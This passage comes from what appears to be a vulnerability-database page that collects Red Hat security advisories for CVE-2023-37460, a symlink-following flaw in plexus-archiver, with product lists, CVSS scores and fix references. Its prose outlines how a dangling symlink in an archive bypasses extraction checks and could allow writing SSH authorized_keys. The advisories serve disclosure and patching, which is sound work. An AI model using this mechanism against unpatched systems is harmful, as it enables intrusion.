"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Server-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Workstation-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "plexus-archiver: Arbitrary File Creation in AbstractUnArchiver"
}
]
}
RHSA-2023:6138
Vulnerability from csaf_redhat
Published
2023-10-26 10:05
Modified
2025-01-06 20:02
Summary
Red Hat Security Advisory: Migration Toolkit for Runtimes security update
Notes
Topic
An update is now available for Migration Toolkit for Runtimes.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
Security Fix(es):
* plexus-archiver: Arbitrary File Creation in AbstractUnArchiver (CVE-2023-37460)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for Migration Toolkit for Runtimes.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Security Fix(es):\n\n* plexus-archiver: Arbitrary File Creation in AbstractUnArchiver (CVE-2023-37460)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2023:6138",
"url": "https://access.redhat.com/errata/RHSA-2023:6138"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=migration.toolkit.runtimes\u0026downloadType=distributions",
"url": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=migration.toolkit.runtimes\u0026downloadType=distributions"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2023-003",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2023-003"
},
{
"category": "external",
"summary": "2242288",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242288"
},
{
"category": "external",
"summary": "WINDUPRULE-1038",
"url": "https://issues.redhat.com/browse/WINDUPRULE-1038"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2023/rhsa-2023_6138.json"
}
],
"title": "Red Hat Security Advisory: Migration Toolkit for Runtimes security update",
"tracking": {
"current_release_date": "2025-01-06T20:02:11+00:00",
"generator": {
"date": "2025-01-06T20:02:11+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.5"
}
},
"id": "RHSA-2023:6138",
"initial_release_date": "2023-10-26T10:05:45+00:00",
"revision_history": [
{
"date": "2023-10-26T10:05:45+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2023-10-26T10:05:45+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2025-01-06T20:02:11+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Migration Toolkit for Runtimes 1 on RHEL 8",
"product": {
"name": "Migration Toolkit for Runtimes 1 on RHEL 8",
"product_id": "Migration Toolkit for Runtimes 1 on RHEL 8",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:migration_toolkit_runtimes:1.0::el8"
}
}
}
],
"category": "product_family",
"name": "Migration Toolkit for Runtimes"
}
],
"category": "vendor",
"name": "Red Hat"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-37460",
"cwe": {
"id": "CWE-61",
"name": "UNIX Symbolic Link (Symlink) Following"
},
"discovery_date": "2023-10-05T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2242288"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Plexus Archiver. While using AbstractUnArchiver for extracting, an archive might lead to arbitrary file creation and possible remote code execution (RCE). Extracting an archive with an entry in the destination directory as a symbolic link whose target does not exist will bypass the directory destination verification.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "plexus-archiver: Arbitrary File Creation in AbstractUnArchiver",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "There are factors beyond the attacker\u0027s control. For example, the victim\u0027s server must have an incomplete SSH server configuration by not having the \"~/.ssh/authorized_keys\" existent and also having an SSH Server Port externally accessible. So, an attacker would need, even in other scenarios, to gather configuration settings and previous knowledge about the environment in order to have a successful attack. The impact is Important as code execution might happen, but it is not guaranteed.\n\nRed Hat Fuse 7 contains plexus-archiver as a transitive dependency and does not make it vulnerable during runtime, hence the low impact.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Migration Toolkit for Runtimes 1 on RHEL 8"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-37460"
},
{
"category": "external",
"summary": "RHBZ#2242288",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242288"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-37460",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-37460"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-37460",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37460"
},
{
"category": "external",
"summary": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m",
"url": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m"
},
{
"category": "external",
"summary": "https://research.jfrog.com/vulnerabilities/plexus-archiver-arbitrary-file-overwrite-xray-526292/",
"url": "https://research.jfrog.com/vulnerabilities/plexus-archiver-arbitrary-file-overwrite-xray-526292/"
}
],
"release_date": "2023-07-25T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2023-10-26T10:05:45+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Migration Toolkit for Runtimes 1 on RHEL 8"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2023:6138"
},
{
"category": "workaround",
"details": "No mitigations are available for this issue.",
"product_ids": [
"Migration Toolkit for Runtimes 1 on RHEL 8"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Migration Toolkit for Runtimes 1 on RHEL 8"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "plexus-archiver: Arbitrary File Creation in AbstractUnArchiver"
}
]
}
rhsa-2023:6138
Vulnerability from csaf_redhat
Published
2023-10-26 10:05
Modified
2025-01-06 20:02
Summary
Red Hat Security Advisory: Migration Toolkit for Runtimes security update
Notes
Topic
An update is now available for Migration Toolkit for Runtimes.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
Security Fix(es):
* plexus-archiver: Arbitrary File Creation in AbstractUnArchiver (CVE-2023-37460)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for Migration Toolkit for Runtimes.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Security Fix(es):\n\n* plexus-archiver: Arbitrary File Creation in AbstractUnArchiver (CVE-2023-37460)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2023:6138",
"url": "https://access.redhat.com/errata/RHSA-2023:6138"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=migration.toolkit.runtimes\u0026downloadType=distributions",
"url": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=migration.toolkit.runtimes\u0026downloadType=distributions"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2023-003",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2023-003"
},
{
"category": "external",
"summary": "2242288",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242288"
},
{
"category": "external",
"summary": "WINDUPRULE-1038",
"url": "https://issues.redhat.com/browse/WINDUPRULE-1038"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2023/rhsa-2023_6138.json"
}
],
"title": "Red Hat Security Advisory: Migration Toolkit for Runtimes security update",
"tracking": {
"current_release_date": "2025-01-06T20:02:11+00:00",
"generator": {
"date": "2025-01-06T20:02:11+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.5"
}
},
"id": "RHSA-2023:6138",
"initial_release_date": "2023-10-26T10:05:45+00:00",
"revision_history": [
{
"date": "2023-10-26T10:05:45+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2023-10-26T10:05:45+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2025-01-06T20:02:11+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Migration Toolkit for Runtimes 1 on RHEL 8",
"product": {
"name": "Migration Toolkit for Runtimes 1 on RHEL 8",
"product_id": "Migration Toolkit for Runtimes 1 on RHEL 8",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:migration_toolkit_runtimes:1.0::el8"
}
}
}
],
"category": "product_family",
"name": "Migration Toolkit for Runtimes"
}
],
"category": "vendor",
"name": "Red Hat"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-37460",
"cwe": {
"id": "CWE-61",
"name": "UNIX Symbolic Link (Symlink) Following"
},
"discovery_date": "2023-10-05T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2242288"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Plexus Archiver. While using AbstractUnArchiver for extracting, an archive might lead to arbitrary file creation and possible remote code execution (RCE). Extracting an archive with an entry in the destination directory as a symbolic link whose target does not exist will bypass the directory destination verification.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "plexus-archiver: Arbitrary File Creation in AbstractUnArchiver",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "There are factors beyond the attacker\u0027s control. For example, the victim\u0027s server must have an incomplete SSH server configuration by not having the \"~/.ssh/authorized_keys\" existent and also having an SSH Server Port externally accessible. So, an attacker would need, even in other scenarios, to gather configuration settings and previous knowledge about the environment in order to have a successful attack. The impact is Important as code execution might happen, but it is not guaranteed.\n\nRed Hat Fuse 7 contains plexus-archiver as a transitive dependency and does not make it vulnerable during runtime, hence the low impact.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Migration Toolkit for Runtimes 1 on RHEL 8"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-37460"
},
{
"category": "external",
"summary": "RHBZ#2242288",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242288"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-37460",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-37460"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-37460",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37460"
},
{
"category": "external",
"summary": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m",
"url": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m"
},
{
"category": "external",
"summary": "https://research.jfrog.com/vulnerabilities/plexus-archiver-arbitrary-file-overwrite-xray-526292/",
"url": "https://research.jfrog.com/vulnerabilities/plexus-archiver-arbitrary-file-overwrite-xray-526292/"
}
],
"release_date": "2023-07-25T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2023-10-26T10:05:45+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Migration Toolkit for Runtimes 1 on RHEL 8"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2023:6138"
},
{
"category": "workaround",
"details": "No mitigations are available for this issue.",
"product_ids": [
"Migration Toolkit for Runtimes 1 on RHEL 8"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Migration Toolkit for Runtimes 1 on RHEL 8"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "plexus-archiver: Arbitrary File Creation in AbstractUnArchiver"
}
]
}
RHSA-2023:6886
Vulnerability from csaf_redhat
Published
2023-11-13 09:42
Modified
2025-01-06 05:00
Summary
Red Hat Security Advisory: plexus-archiver security update
Notes
Topic
An update for plexus-archiver is now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
The Plexus project provides a full software stack for creating and executing software projects. Based on the Plexus container, the applications can utilise component-oriented programming to build modular, reusable components that can easily be assembled and reused. The plexus-archiver component provides functions to create and extract archives.
Security Fix(es):
* plexus-archiver: Arbitrary File Creation in AbstractUnArchiver (CVE-2023-37460)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for plexus-archiver is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "The Plexus project provides a full software stack for creating and executing software projects. Based on the Plexus container, the applications can utilise component-oriented programming to build modular, reusable components that can easily be assembled and reused. The plexus-archiver component provides functions to create and extract archives.\n\nSecurity Fix(es):\n\n* plexus-archiver: Arbitrary File Creation in AbstractUnArchiver (CVE-2023-37460)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2023:6886",
"url": "https://access.redhat.com/errata/RHSA-2023:6886"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2242288",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242288"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2023/rhsa-2023_6886.json"
}
],
"title": "Red Hat Security Advisory: plexus-archiver security update",
"tracking": {
"current_release_date": "2025-01-06T05:00:10+00:00",
"generator": {
"date": "2025-01-06T05:00:10+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.5"
}
},
"id": "RHSA-2023:6886",
"initial_release_date": "2023-11-13T09:42:49+00:00",
"revision_history": [
{
"date": "2023-11-13T09:42:49+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2023-11-13T09:42:49+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2025-01-06T05:00:10+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux Client Optional (v. 7)",
"product": {
"name": "Red Hat Enterprise Linux Client Optional (v. 7)",
"product_id": "7Client-optional-7.9.Z",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:7::client"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux ComputeNode Optional (v. 7)",
"product": {
"name": "Red Hat Enterprise Linux ComputeNode Optional (v. 7)",
"product_id": "7ComputeNode-optional-7.9.Z",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:7::computenode"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux Server Optional (v. 7)",
"product": {
"name": "Red Hat Enterprise Linux Server Optional (v. 7)",
"product_id": "7Server-optional-7.9.Z",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:7::server"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux Workstation Optional (v. 7)",
"product": {
"name": "Red Hat Enterprise Linux Workstation Optional (v. 7)",
"product_id": "7Workstation-optional-7.9.Z",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:7::workstation"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "plexus-archiver-0:2.4.2-6.el7_9.src",
"product": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.src",
"product_id": "plexus-archiver-0:2.4.2-6.el7_9.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/plexus-archiver@2.4.2-6.el7_9?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "plexus-archiver-0:2.4.2-6.el7_9.noarch",
"product": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.noarch",
"product_id": "plexus-archiver-0:2.4.2-6.el7_9.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/plexus-archiver@2.4.2-6.el7_9?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"product": {
"name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"product_id": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/plexus-archiver-javadoc@2.4.2-6.el7_9?arch=noarch"
}
}
}
],
"category": "architecture",
"name": "noarch"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Client Optional (v. 7)",
"product_id": "7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch"
},
"product_reference": "plexus-archiver-0:2.4.2-6.el7_9.noarch",
"relates_to_product_reference": "7Client-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.src as a component of Red Hat Enterprise Linux Client Optional (v. 7)",
"product_id": "7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src"
},
"product_reference": "plexus-archiver-0:2.4.2-6.el7_9.src",
"relates_to_product_reference": "7Client-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Client Optional (v. 7)",
"product_id": "7Client-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch"
},
"product_reference": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"relates_to_product_reference": "7Client-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)",
"product_id": "7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch"
},
"product_reference": "plexus-archiver-0:2.4.2-6.el7_9.noarch",
"relates_to_product_reference": "7ComputeNode-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.src as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)",
"product_id": "7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src"
},
"product_reference": "plexus-archiver-0:2.4.2-6.el7_9.src",
"relates_to_product_reference": "7ComputeNode-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)",
"product_id": "7ComputeNode-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch"
},
"product_reference": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"relates_to_product_reference": "7ComputeNode-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Server Optional (v. 7)",
"product_id": "7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch"
},
"product_reference": "plexus-archiver-0:2.4.2-6.el7_9.noarch",
"relates_to_product_reference": "7Server-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.src as a component of Red Hat Enterprise Linux Server Optional (v. 7)",
"product_id": "7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src"
},
"product_reference": "plexus-archiver-0:2.4.2-6.el7_9.src",
"relates_to_product_reference": "7Server-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Server Optional (v. 7)",
"product_id": "7Server-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch"
},
"product_reference": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"relates_to_product_reference": "7Server-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)",
"product_id": "7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch"
},
"product_reference": "plexus-archiver-0:2.4.2-6.el7_9.noarch",
"relates_to_product_reference": "7Workstation-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.src as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)",
"product_id": "7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src"
},
"product_reference": "plexus-archiver-0:2.4.2-6.el7_9.src",
"relates_to_product_reference": "7Workstation-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)",
"product_id": "7Workstation-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch"
},
"product_reference": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"relates_to_product_reference": "7Workstation-optional-7.9.Z"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-37460",
"cwe": {
"id": "CWE-61",
"name": "UNIX Symbolic Link (Symlink) Following"
},
"discovery_date": "2023-10-05T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2242288"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Plexus Archiver. While using AbstractUnArchiver for extracting, an archive might lead to arbitrary file creation and possible remote code execution (RCE). Extracting an archive with an entry in the destination directory as a symbolic link whose target does not exist will bypass the directory destination verification.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "plexus-archiver: Arbitrary File Creation in AbstractUnArchiver",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "There are factors beyond the attacker\u0027s control. For example, the victim\u0027s server must have an incomplete SSH server configuration by not having the \"~/.ssh/authorized_keys\" existent and also having an SSH Server Port externally accessible. So, an attacker would need, even in other scenarios, to gather configuration settings and previous knowledge about the environment in order to have a successful attack. The impact is Important as code execution might happen, but it is not guaranteed.\n\nRed Hat Fuse 7 contains plexus-archiver as a transitive dependency and does not make it vulnerable during runtime, hence the low impact.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Client-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
